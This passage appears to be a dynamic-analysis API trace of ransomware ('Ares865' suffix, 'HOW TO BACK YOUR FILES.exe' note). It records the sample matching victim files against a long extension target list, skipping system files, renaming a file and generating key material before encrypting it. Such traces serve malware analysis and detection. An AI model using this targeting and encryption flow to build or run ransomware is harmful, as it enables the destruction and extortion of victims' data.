lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0085.996] lstrlenW (lpString="sis") returned 3 [0085.996] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0085.996] lstrlenW (lpString="spq") returned 3 [0085.996] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0085.996] lstrlenW (lpString="te") returned 2 [0085.996] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0085.996] lstrlenW (lpString="teacher") returned 7 [0085.996] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0085.996] lstrlenW (lpString="tmd") returned 3 [0085.996] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0085.996] lstrlenW (lpString="tps") returned 3 [0085.996] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0085.996] lstrlenW (lpString="trc") returned 3 [0085.996] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0085.996] lstrlenW (lpString="trc") returned 3 [0085.996] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0085.996] lstrlenW (lpString="trm") returned 3 [0085.997] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0085.997] lstrlenW (lpString="udb") returned 3 [0085.997] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0085.997] lstrlenW (lpString="udl") returned 3 [0085.997] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0085.997] lstrlenW (lpString="usr") returned 3 [0085.997] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0085.997] lstrlenW (lpString="v12") returned 3 [0085.997] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0085.997] lstrlenW (lpString="vis") returned 3 [0085.997] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0085.997] lstrlenW (lpString="vpd") returned 3 [0085.997] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0085.997] lstrlenW (lpString="vvv") returned 3 [0085.997] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0085.997] lstrlenW (lpString="wdb") returned 3 [0085.997] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0085.997] lstrlenW (lpString="wmdb") returned 4 [0085.997] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0085.997] lstrlenW (lpString="wrk") returned 3 [0085.997] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0085.997] lstrlenW (lpString="xdb") returned 3 [0085.997] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0085.997] lstrlenW (lpString="xld") returned 3 [0085.997] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0085.997] lstrlenW (lpString="xmlff") returned 5 [0085.997] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0085.997] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll.Ares865") returned 77 [0085.997] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\mapir.dll.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\mapir.dll.trx_dll.ares865"), dwFlags=0x1) returned 1 [0085.998] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\mapir.dll.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0085.999] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=294240) returned 1 [0085.999] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0085.999] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0085.999] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0085.999] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0086.000] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0086.000] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.000] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x48060, lpName=0x0) returned 0x15c [0086.001] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x48060) returned 0x420000 [0086.016] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0086.017] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0086.017] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.017] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0086.017] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0086.017] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0086.017] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0086.017] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0086.017] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0086.017] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0086.017] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0086.017] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0086.017] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0086.018] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0086.020] CloseHandle (hObject=0x15c) returned 1 [0086.020] CloseHandle (hObject=0x118) returned 1 [0086.020] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0086.020] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0086.020] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0086.022] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x58968200, ftCreationTime.dwHighDateTime=0x1cac809, ftLastAccessTime.dwLowDateTime=0xeee1cd90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x58968200, ftLastWriteTime.dwHighDateTime=0x1cac809, nFileSizeHigh=0x0, nFileSizeLow=0xc160, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MOR6INT.REST.trx_dll", cAlternateFileName="MOR6IN~1.TRX")) returned 1 [0086.022] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0086.022] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="aoldtz.exe") returned 1 [0086.022] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2=".") returned 1 [0086.022] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="..") returned 1 [0086.022] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="windows") returned -1 [0086.022] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="bootmgr") returned 1 [0086.022] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="temp") returned -1 [0086.022] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="pagefile.sys") returned -1 [0086.022] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="boot") returned 1 [0086.022] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="ids.txt") returned 1 [0086.022] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="ntuser.dat") returned -1 [0086.022] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="perflogs") returned -1 [0086.022] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="MSBuild") returned -1 [0086.022] lstrlenW (lpString="MOR6INT.REST.trx_dll") returned 20 [0086.022] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll") returned 69 [0086.022] lstrcpyW (in: lpString1=0x2cce468, lpString2="MOR6INT.REST.trx_dll" | out: lpString1="MOR6INT.REST.trx_dll") returned="MOR6INT.REST.trx_dll" [0086.022] lstrlenW (lpString="MOR6INT.REST.trx_dll") returned 20 [0086.022] lstrlenW (lpString="Ares865") returned 7 [0086.022] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0086.022] lstrlenW (lpString=".dll") returned 4 [0086.022] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2=".dll") returned 1 [0086.022] lstrlenW (lpString=".lnk") returned 4 [0086.022] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2=".lnk") returned 1 [0086.022] lstrlenW (lpString=".ini") returned 4 [0086.022] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2=".ini") returned 1 [0086.022] lstrlenW (lpString=".sys") returned 4 [0086.022] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2=".sys") returned 1 [0086.022] lstrlenW (lpString="MOR6INT.REST.trx_dll") returned 20 [0086.022] lstrlenW (lpString="bak") returned 3 [0086.023] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0086.023] lstrlenW (lpString="ba_") returned 3 [0086.023] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0086.023] lstrlenW (lpString="dbb") returned 3 [0086.023] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0086.023] lstrlenW (lpString="vmdk") returned 4 [0086.023] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0086.023] lstrlenW (lpString="rar") returned 3 [0086.023] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0086.023] lstrlenW (lpString="zip") returned 3 [0086.023] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0086.023] lstrlenW (lpString="tgz") returned 3 [0086.023] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0086.023] lstrlenW (lpString="vbox") returned 4 [0086.023] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0086.023] lstrlenW (lpString="vdi") returned 3 [0086.023] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0086.023] lstrlenW (lpString="vhd") returned 3 [0086.023] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0086.023] lstrlenW (lpString="vhdx") returned 4 [0086.023] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0086.023] lstrlenW (lpString="avhd") returned 4 [0086.023] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0086.023] lstrlenW (lpString="db") returned 2 [0086.023] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0086.023] lstrlenW (lpString="db2") returned 3 [0086.023] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0086.023] lstrlenW (lpString="db3") returned 3 [0086.023] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0086.023] lstrlenW (lpString="dbf") returned 3 [0086.023] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0086.023] lstrlenW (lpString="mdf") returned 3 [0086.023] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0086.023] lstrlenW (lpString="mdb") returned 3 [0086.023] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0086.023] lstrlenW (lpString="sql") returned 3 [0086.023] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0086.024] lstrlenW (lpString="sqlite") returned 6 [0086.024] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0086.024] lstrlenW (lpString="sqlite3") returned 7 [0086.024] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0086.024] lstrlenW (lpString="sqlitedb") returned 8 [0086.024] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0086.024] lstrlenW (lpString="xml") returned 3 [0086.024] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0086.024] lstrlenW (lpString="$er") returned 3 [0086.024] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0086.024] lstrlenW (lpString="4dd") returned 3 [0086.024] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0086.024] lstrlenW (lpString="4dl") returned 3 [0086.024] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0086.024] lstrlenW (lpString="^^^") returned 3 [0086.024] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0086.024] lstrlenW (lpString="abs") returned 3 [0086.024] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0086.024] lstrlenW (lpString="abx") returned 3 [0086.024] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0086.024] lstrlenW (lpString="accdb") returned 5 [0086.024] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0086.024] lstrlenW (lpString="accdc") returned 5 [0086.024] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0086.024] lstrlenW (lpString="accde") returned 5 [0086.024] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0086.024] lstrlenW (lpString="accdr") returned 5 [0086.024] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0086.024] lstrlenW (lpString="accdt") returned 5 [0086.024] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0086.024] lstrlenW (lpString="accdw") returned 5 [0086.024] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0086.024] lstrlenW (lpString="accft") returned 5 [0086.024] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0086.024] lstrlenW (lpString="adb") returned 3 [0086.024] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0086.024] lstrlenW (lpString="adb") returned 3 [0086.024] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0086.025] lstrlenW (lpString="ade") returned 3 [0086.025] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0086.025] lstrlenW (lpString="adf") returned 3 [0086.025] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0086.025] lstrlenW (lpString="adn") returned 3 [0086.025] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0086.025] lstrlenW (lpString="adp") returned 3 [0086.025] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0086.025] lstrlenW (lpString="alf") returned 3 [0086.025] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0086.025] lstrlenW (lpString="ask") returned 3 [0086.025] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0086.025] lstrlenW (lpString="btr") returned 3 [0086.025] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0086.025] lstrlenW (lpString="cat") returned 3 [0086.025] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0086.025] lstrlenW (lpString="cdb") returned 3 [0086.025] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0086.025] lstrlenW (lpString="ckp") returned 3 [0086.025] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0086.025] lstrlenW (lpString="cma") returned 3 [0086.025] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0086.025] lstrlenW (lpString="cpd") returned 3 [0086.025] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0086.025] lstrlenW (lpString="dacpac") returned 6 [0086.025] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0086.025] lstrlenW (lpString="dad") returned 3 [0086.025] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0086.025] lstrlenW (lpString="dadiagrams") returned 10 [0086.025] lstrcmpiW (lpString1="ST.trx_dll", lpString2="dadiagrams") returned 1 [0086.025] lstrlenW (lpString="daschema") returned 8 [0086.025] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0086.025] lstrlenW (lpString="db-journal") returned 10 [0086.025] lstrcmpiW (lpString1="ST.trx_dll", lpString2="db-journal") returned 1 [0086.025] lstrlenW (lpString="db-shm") returned 6 [0086.025] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0086.025] lstrlenW (lpString="db-wal") returned 6 [0086.025] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0086.026] lstrlenW (lpString="dbc") returned 3 [0086.026] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0086.026] lstrlenW (lpString="dbs") returned 3 [0086.026] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0086.026] lstrlenW (lpString="dbt") returned 3 [0086.026] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0086.026] lstrlenW (lpString="dbv") returned 3 [0086.026] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0086.026] lstrlenW (lpString="dbx") returned 3 [0086.026] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0086.026] lstrlenW (lpString="dcb") returned 3 [0086.026] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0086.026] lstrlenW (lpString="dct") returned 3 [0086.026] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0086.026] lstrlenW (lpString="dcx") returned 3 [0086.026] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0086.026] lstrlenW (lpString="ddl") returned 3 [0086.026] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0086.026] lstrlenW (lpString="dlis") returned 4 [0086.026] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0086.026] lstrlenW (lpString="dp1") returned 3 [0086.026] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0086.026] lstrlenW (lpString="dqy") returned 3 [0086.026] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0086.026] lstrlenW (lpString="dsk") returned 3 [0086.026] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0086.026] lstrlenW (lpString="dsn") returned 3 [0086.026] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0086.026] lstrlenW (lpString="dtsx") returned 4 [0086.026] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0086.026] lstrlenW (lpString="dxl") returned 3 [0086.026] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0086.026] lstrlenW (lpString="eco") returned 3 [0086.026] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0086.026] lstrlenW (lpString="ecx") returned 3 [0086.026] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0086.027] lstrlenW (lpString="edb") returned 3 [0086.027] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0086.027] lstrlenW (lpString="epim") returned 4 [0086.027] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0086.027] lstrlenW (lpString="fcd") returned 3 [0086.027] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0086.027] lstrlenW (lpString="fdb") returned 3 [0086.027] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0086.027] lstrlenW (lpString="fic") returned 3 [0086.027] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0086.027] lstrlenW (lpString="flexolibrary") returned 12 [0086.027] lstrcmpiW (lpString1="REST.trx_dll", lpString2="flexolibrary") returned 1 [0086.027] lstrlenW (lpString="fm5") returned 3 [0086.027] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0086.027] lstrlenW (lpString="fmp") returned 3 [0086.027] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0086.027] lstrlenW (lpString="fmp12") returned 5 [0086.027] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0086.027] lstrlenW (lpString="fmpsl") returned 5 [0086.027] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0086.027] lstrlenW (lpString="fol") returned 3 [0086.027] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0086.027] lstrlenW (lpString="fp3") returned 3 [0086.027] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0086.027] lstrlenW (lpString="fp4") returned 3 [0086.027] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0086.027] lstrlenW (lpString="fp5") returned 3 [0086.027] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0086.027] lstrlenW (lpString="fp7") returned 3 [0086.027] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0086.027] lstrlenW (lpString="fpt") returned 3 [0086.027] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0086.027] lstrlenW (lpString="frm") returned 3 [0086.027] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0086.027] lstrlenW (lpString="gdb") returned 3 [0086.027] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0086.027] lstrlenW (lpString="gdb") returned 3 [0086.027] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0086.028] lstrlenW (lpString="grdb") returned 4 [0086.028] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0086.028] lstrlenW (lpString="gwi") returned 3 [0086.028] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0086.028] lstrlenW (lpString="hdb") returned 3 [0086.028] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0086.028] lstrlenW (lpString="his") returned 3 [0086.028] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0086.028] lstrlenW (lpString="ib") returned 2 [0086.028] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0086.028] lstrlenW (lpString="idb") returned 3 [0086.028] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0086.028] lstrlenW (lpString="ihx") returned 3 [0086.028] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0086.028] lstrlenW (lpString="itdb") returned 4 [0086.028] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0086.028] lstrlenW (lpString="itw") returned 3 [0086.028] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0086.028] lstrlenW (lpString="jet") returned 3 [0086.028] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0086.028] lstrlenW (lpString="jtx") returned 3 [0086.028] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0086.028] lstrlenW (lpString="kdb") returned 3 [0086.028] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0086.028] lstrlenW (lpString="kexi") returned 4 [0086.028] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0086.028] lstrlenW (lpString="kexic") returned 5 [0086.028] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0086.028] lstrlenW (lpString="kexis") returned 5 [0086.028] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0086.028] lstrlenW (lpString="lgc") returned 3 [0086.028] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0086.028] lstrlenW (lpString="lwx") returned 3 [0086.028] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0086.028] lstrlenW (lpString="maf") returned 3 [0086.028] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0086.028] lstrlenW (lpString="maq") returned 3 [0086.028] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0086.029] lstrlenW (lpString="mar") returned 3 [0086.029] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0086.029] lstrlenW (lpString="marshal") returned 7 [0086.029] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0086.029] lstrlenW (lpString="mas") returned 3 [0086.029] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0086.029] lstrlenW (lpString="mav") returned 3 [0086.029] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0086.029] lstrlenW (lpString="maw") returned 3 [0086.029] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0086.029] lstrlenW (lpString="mdbhtml") returned 7 [0086.029] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0086.029] lstrlenW (lpString="mdn") returned 3 [0086.029] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0086.029] lstrlenW (lpString="mdt") returned 3 [0086.029] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0086.029] lstrlenW (lpString="mfd") returned 3 [0086.029] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0086.029] lstrlenW (lpString="mpd") returned 3 [0086.029] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0086.029] lstrlenW (lpString="mrg") returned 3 [0086.029] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0086.029] lstrlenW (lpString="mud") returned 3 [0086.029] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0086.029] lstrlenW (lpString="mwb") returned 3 [0086.029] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0086.029] lstrlenW (lpString="myd") returned 3 [0086.029] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0086.029] lstrlenW (lpString="ndf") returned 3 [0086.029] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0086.029] lstrlenW (lpString="nnt") returned 3 [0086.029] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0086.029] lstrlenW (lpString="nrmlib") returned 6 [0086.029] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0086.029] lstrlenW (lpString="ns2") returned 3 [0086.029] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0086.030] lstrlenW (lpString="ns3") returned 3 [0086.030] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0086.030] lstrlenW (lpString="ns4") returned 3 [0086.030] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0086.030] lstrlenW (lpString="nsf") returned 3 [0086.030] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0086.030] lstrlenW (lpString="nv") returned 2 [0086.030] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0086.030] lstrlenW (lpString="nv2") returned 3 [0086.030] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0086.030] lstrlenW (lpString="nwdb") returned 4 [0086.030] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0086.030] lstrlenW (lpString="nyf") returned 3 [0086.030] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0086.030] lstrlenW (lpString="odb") returned 3 [0086.030] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0086.030] lstrlenW (lpString="odb") returned 3 [0086.030] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0086.030] lstrlenW (lpString="oqy") returned 3 [0086.030] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0086.030] lstrlenW (lpString="ora") returned 3 [0086.030] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0086.030] lstrlenW (lpString="orx") returned 3 [0086.030] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0086.030] lstrlenW (lpString="owc") returned 3 [0086.030] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0086.030] lstrlenW (lpString="p96") returned 3 [0086.030] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0086.030] lstrlenW (lpString="p97") returned 3 [0086.030] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0086.030] lstrlenW (lpString="pan") returned 3 [0086.030] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0086.030] lstrlenW (lpString="pdb") returned 3 [0086.030] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0086.030] lstrlenW (lpString="pdm") returned 3 [0086.030] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0086.030] lstrlenW (lpString="pnz") returned 3 [0086.031] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0086.031] lstrlenW (lpString="qry") returned 3 [0086.031] lstrcmpiW (lpString1="dll", 